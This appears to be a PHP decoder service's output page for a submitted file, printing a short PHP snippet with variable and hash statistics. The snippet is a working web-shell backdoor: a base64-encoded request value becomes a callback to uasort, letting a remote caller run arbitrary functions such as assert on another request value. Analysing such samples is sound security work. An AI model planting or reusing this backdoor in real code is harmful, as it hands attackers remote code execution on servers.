Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e = $_REQUEST['e']; $arr = array('test', $_REQUEST['pass']); uasort($arr, base64..

Decoded Output download

<?php
	$e = $_REQUEST['e'];
	$arr = array('test', $_REQUEST['pass']);
	uasort($arr, base64_decode($e));
?>

Did this file decode correctly?

Original Code

<?php
	$e = $_REQUEST['e'];
	$arr = array('test', $_REQUEST['pass']);
	uasort($arr, base64_decode($e));
?>

Function Calls

base64_decode 1

Variables

$e None
$arr [{'key': 0, 'value': 'test'}, {'key': 1, 'value': None}]

Stats

MD5 eca51b981cfcc3be29e07be61a5b1356
Eval Count 0
Decode Time 118 ms